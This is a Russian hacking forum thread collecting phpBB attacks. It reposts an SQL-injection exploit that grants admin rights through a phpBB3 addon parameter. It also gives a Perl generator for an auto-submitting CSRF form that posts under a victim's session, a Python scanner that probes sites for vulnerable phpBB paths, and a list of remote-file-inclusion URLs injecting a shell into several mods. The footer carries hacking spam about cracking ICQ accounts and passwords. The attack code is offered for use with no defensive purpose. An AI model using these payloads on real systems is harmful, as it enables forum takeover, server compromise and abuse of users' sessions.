Старый 04.09.2009, 13:34   #1
DragOn
Полусинтетика
 
Аватар для DragOn
 
Регистрация: 13.04.2009
Сообщений: 1,397
DragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспорима
DragOn на форуме

По умолчанию Обзор уязвимостей phpBB


phpBB3 addon prime_quick_style GetAdmin Vulnerability


Код:
################################################## ########################
#
# phpBB3 addon prime_quick_style GetAdmin Exploit
#
# Vulnerability found and exploited by -SmoG-
#
# target file: prime_quick_style.php
#
#
# vuln: POST parameter "prime_quick_style" is injectable.
# source: http://www.phpbb.com/community/viewtopic.php?f=70&t=692625
#
# HowTo: after login, go to "./ucp.php" and manipulate the content from the "prime_quick_style"-parameter.
# example: prime_quick_style = "5,user_type = 3, user_permissions = ''"
# 
# query will be look like this: "UPDATE USER_TABLE SET user_style = ANY_STYLE(integer), user_type = 3, user_permissions = '' WHERE user_id = YourId"
#
# gratz, now u will be an admin  
#
# --- greetz to Pronoobz.org --- AbiDez, ChinaSun and ~dp~ || Thanks you a lot! ---
#
#
# -( by -SmoG- )-
################################################## ########################
# milw0rm.com [2009-09-01]
__________________
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
  Ответить с цитированием
Ответ: Обзор уязвимостей phpBB
Старый 19.11.2009, 09:03   #2
DragOn
Полусинтетика
 
Аватар для DragOn
 
Регистрация: 13.04.2009
Сообщений: 1,397
DragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспорима
DragOn на форуме
По умолчанию Ответ: Обзор уязвимостей phpBB

phpBB3 addon prime_quick_style GetAdmin Vulnerability

Код:
################################################## ########################
#
# phpBB3 addon prime_quick_style GetAdmin Exploit
#
# Vulnerability found and exploited by -SmoG-
#
# target file: prime_quick_style.php
#
#
# vuln: POST parameter "prime_quick_style" is injectable.
# source: http://www.phpbb.com/community/viewtopic.php?f=70&t=692625
#
# HowTo: after login, go to "./ucp.php" and manipulate the content from the "prime_quick_style"-parameter.
# example: prime_quick_style = "5,user_type = 3, user_permissions = ''"
# 
# query will be look like this: "UPDATE USER_TABLE SET user_style = ANY_STYLE(integer), user_type = 3, user_permissions = '' WHERE user_id = YourId"
#
# gratz, now u will be an admin  
#
# --- greetz to Pronoobz.org --- AbiDez, ChinaSun and ~dp~ || Thanks you a lot! ---
#
#
# -( by -SmoG- )-
################################################## ########################
# milw0rm.com [2009-09-01]
__________________
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
  Ответить с цитированием
Ответ: Обзор уязвимостей phpBB
Старый 20.11.2009, 06:45   #3
cRv
RAM 8MB
 
Аватар для cRv
 
Регистрация: 24.10.2009
Сообщений: 10
cRv Новичок
cRv вне форума
По умолчанию Ответ: Обзор уязвимостей phpBB

phpBB Topic AutoSender

Код:
--------------------------------------------------------------- 
 ____            __________         __             ____  __    
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_ 
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\ 
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  | 
 |___|___|  /\__|  /______  /\___  >__|            |___||__| 
          \/\______|      \/     \/                            
--------------------------------------------------------------- 

Http://www.inj3ct-it.org       Staff[at]inj3ct-it[dot]org    

-------------------------------------------------------------- 

 0day Auto Sender Post phpBB2 

--------------------------------------------------------------- 

# Coded by TuoNuX 

# Description: 

autosendform generator 

--------------------------------------------------------------- 

--------------------------------------------------------------- 
asf.pl 
--------------------------------------------------------------- 

#/usr/bin/perl 
#0day Auto Sender Post phpBB2 
#TuoNuX@hotmail.it 
#http://www.localh0st.altervista.org 
#http://www.hackingz0ne.altervista.org 
print q { 
__________________________________________________  ___________________ 


 ___           _ _      __  _ 
|_ _|_ _  ___ | \ | _ _ \ \/  * 0day Auto Sender Post phpBB2 
 | || | |/ . \|   || | | \ \  * TuoNuX@hotmail.it 
 |_|`___|\___/|_\_|`___|_/\_\ * http://www.localh0st.altervista.org 
               * http://www.hackingz0ne.altervista.org 
 0day Auto Sender Post phpBB2 


__________________________________________________  ___________________ 
}; 
print q { 
[+]Insert host site : 
[-]Indirizzo: }; 
$indirizzo = <stdin>; 
chomp($indirizzo); 
print q { 
__________________________________________________  ___________________ 
[+]Insert the forum path (for example /phpBB/) : 
[-]Cartella: }; 
$cartella = <stdin>; 
chomp($cartella); 
print q { 
__________________________________________________  ___________________ 
[+]Insert ID section ( number after "?f=" ): 
[-]ID Sezione: }; 
$id = <stdin>; 
chomp($id); 
print q { 
__________________________________________________  ___________________ 
[+]Insert Topic Title : 
[-]Titolo: }; 
$titolo = <stdin>; 
chomp($titolo); 
print q { 
__________________________________________________  ___________________ 
[+]Insert the body topic : 
[+]Yuc can use also the BB code es: [img]urlimmagine[/img] 
[-]Testo: }; 
$testo = <stdin>; 
chomp($testo); 
print q { 
__________________________________________________  ___________________ 
[+]Insert the victim sid , don't write everyone if there isn't it : 
[-]Sid: }; 
$sid = <stdin>; 
chomp($sid); 
$sito = "http://$indirizzo$cartella"; 
print "\n----------------Riepilogo----------------------\n\n"; 
print "Forum           =>     $sito\n"; 
print "ID Section     =>     $id\n"; 
print "Title          =>     $titolo\n"; 
print "Message       =>     $testo\n"; 
print "SID             =>     $sid\n\n"; 
print "----------------Riepilogo----------------------\n\n"; 
print "Enter for continued...."; 
<stdin>; 
$m1 = q {<html><head><body><form action="}; 
$m2 = "$sito"; 
$m3 = q {posting.php" method="post" name="post"><textarea name="message" class="post">}; 
$m4 = "$testo"; 
$m5 = q {</textarea><input type="hidden" value="}; 
$m12 = "\n\nTuoNuX 0day phpBB2 Exploit\n\n\n"; 
$m6 = "$titolo"; 
$m7 = q {" class="post" tabindex="2" style="width: 450px;" maxlength="60" size="45" name="subject"/><input type="hidden" value="" class="post" maxlength="255" size="50" name="poll_title"/><input type="hidden" value="" class="post" maxlength="255" size="50" name="add_poll_option_text"/><input type="hidden" value="0" class="post" maxlength="3" size="3" name="poll_length"/><input type="hidden" value="Anteprima" class="mainoption" name="preview" tabindex="5"/><input type="hidden" value="Invia" class="mainoption" name="post" tabindex="6" accesskey="s"/><input type="hidden" name="mode" value="newtopic" /><input type="hidden" name="f" value="}; 
$m8 = "$id"; 
$m9 = q {"> <input type="hidden" name="sid" value="}; 
$m10 = "$sid"; 
$m11 = q {" /></form><script>document.post.submit()</script></html></head></body>}; 
$html = "$m1$m2$m3$m4$m12$m5$m6$m7$m8$m9$m10$m11"; 
open ( FILE , ">phpBB20dayexploit.html" ) || die ( "" ); 
print FILE $html; 
close ( FILE ); 
print q { 
__________________________________________________  ___________________


PHP 3 login backdoor



Код:
#!/usr/bin/python
#This is a phpBB scanner, searches if vulnerable paths
#exist. Put phpvuln.txt in the dir
#at which you are running this script.
#Every path in phpvuln.txt has a vuln. or an exploit for it.
#(considering its the right version)

#Changelog v1.2 : added update function

#Changelog v1.1 : added verbose mode, changed http 
#response bug, added new vuln. paths

#http://www.darkc0de.com
##d3hydr8[at]gmail[dot]com

import sys, httplib, time, urllib2

def getserv(path):

    try:
        h = httplib.HTTP(host+":"+port)
        h.putrequest("HEAD", path)
        h.putheader("Host", host)
        h.endheaders()
        status, reason, headers = h.getreply()
    except: 
        print "\n[-] Error: Name or service not known. Check your host.\n"
        sys.exit(1)
    return status, reason, headers.get("Server")

def timer():
    now = time.localtime(time.time())
    return time.asctime(now)

def title():
    print "\n\t   d3hydr8[at]gmail[dot]com PhpBBscanner v1.2"
    print "\t--------------------------------------------------"

def update():
    try:
        lines = open("phpvuln.txt", "r").readlines()
    except(IOError): 
         print "[-] Error: Check your phpvuln.txt path and permissions"
        print "[-] Update Failed\n"
        sys.exit(1)
    try:
        paths = urllib2.urlopen("http://www.darkc0de.com/scanners/phpvuln.txt").readlines()
    except:
        print "[-] Error: Couldn't connect to remote database"
        print "[-] Update Failed\n"
        sys.exit(1)
    if len(paths) > len(lines):
        dif = int(len(paths)-len(lines))
        print "[+] Found:",dif,"updates"
        print "\n[+] Writing Updates"
        file = open("phpvuln.txt", "a")
        for path in paths[-dif:]:
            if path[-1:] == "\n":
                path = path[:-1]
            print "[+] New:",path
            file.writelines(path+"\n")
        file.close()
        print "\n[+] Update Complete\n"
    else:
        print "[-] No Updates Available\n"
    sys.exit(1)

if len(sys.argv) >= 5 or len(sys.argv) == 1:
    title()
    print "\n\t[+] Usage: ./phpbbscan.py <host> <port>\n"
    print "\t[options]"
    print "\t   -v/-verbose : Shows all http requests and responses"
    print "\t   -u/-update : Updates phpvuln.txt with the latest"
    print "\n\t[+] Ex. ./phpbbscan.py -update"
    print "\t[+] Ex. ./phpbbscan.py google.com 80 -verbose\n"
    sys.exit(1)

title()

if sys.argv[1].lower() == "-u" or sys.argv[1].lower() == "-update":
    print "\n[+] Updating Database File"
    update()
    
host = sys.argv[1]
port = sys.argv[2]

for arg in sys.argv[1:]:
    if arg.lower() == "-v" or arg.lower() == "-verbose":
        verbose = 1
    else:
        verbose = 0

if host[:7] == "http://":
    host = host.replace("http://","")
if host[-1] == "/":
    host = host[:-1]
    
print "[+] Getting responses" 
okresp,reason,server = getserv("/")
badresp = getserv("/d3hydr8.html")[:1]

if okresp == badresp[0]:
    print "\n[-] Responses matched, try another host.\n"
    sys.exit(1)
else:
    print "\n[+] Target host:",host
    print "[+] Target port:",port
    print "[+] Target server:",server
    print "[+] Target OK response:",okresp
    print "[+] Target BAD response:",badresp[0], reason
    print "[+] Scan Started at",timer()
    if verbose ==1:
        print "\n[+] Verbose Mode On"

dirs = ["/","/bb/","/phpbb/","/forum/","/forums/","/phpBB2/","/phpbb/phpBB2/"]

try:
    lines = open("phpvuln.txt", "r").readlines()
    print "\n[+]",len(lines)*len(dirs),"paths loaded\n"
except(IOError): 
     print "[-] Error: Check your vulnerabilities list path\n"
    sys.exit(1)

vulns = []
print "[+] Scanning...\n" 
for d in dirs:
    for line in lines:
        status, reason = getserv(d+line[:-1])[:2]
        if verbose ==1:
            print "[+]",status,reason,":",d+line,"\n"
        if status == okresp:
            vulns.append(d+line)
            print "\t[!]",status,reason,":",d+line,"\n"
        if status == int(401):
            print "\t--",status,reason,":Needs Authentication [",d+line,"]\n"
        
if len(vulns) == 0:
    print "[-] Couldn't find any vuln. paths\n"
else:
    print "[!] Found",len(vulns),"possible vulnerabilities, check manually.\n"
    for vuln in vulns:
        print "\t[+] ",vuln
print "\n[+] Scan completed at", timer(),"\n"

Моды


TopList Hack for PHPBB <= 1.3.8

Код:
/toplist.php?f=toplist_top10&phpbb_root_path=shell
Advanced GuestBook
Код:
/admin/addentry.php?phpbb_root_path=shell
Knowledge Base Mod
Код:
/includes/kb_constants.php?module_root_path=shell
phpBB auction mod
Код:
/auction/auction_common.php?phpbb_root_path=shell
phpRaid <= 3.0.b3

Код:
/[phpraidpath]/auth/auth.php?phpbb_root_path=shell
Код:
/[phpraidpath]/auth/auth_phpbb/phpbb_root_path=shell
Код:
/[phpraidpath]/auth/auth.php?smf_root_path=shell
Код:
/[phpraidpath]/auth/auth_SMF/smf_root_path=shell
PafileDB

Код:
/[pdbpath]/includes/pafiledb_constants.php?module_root_path=shell
Foing <= 0.7.0

Код:
/index.php?phpbb_root_path=shell
Код:
/song.php?phpbb_root_path=shell
Код:
/faq.php?phpbb_root_path=shell
Код:
/list.php?phpbb_root_path=shell
Код:
/gen_m3u.php?phpbb_root_path=shell
Код:
/playlist.php?phpbb_root_path=shell
  Ответить с цитированием
Ответ

Метки
уязвимости, уязвимости в phpbb, уязвимости в пхпбб

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.



взломать аську аську взломать взлом программы сделать взлом программы как сделать взлом программы хакерские сайты как легко взломать аську лучшие хакерские сайты топ список хакерские сайты взлом паролей легкий взлом паролей

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd. Перевод: zCarot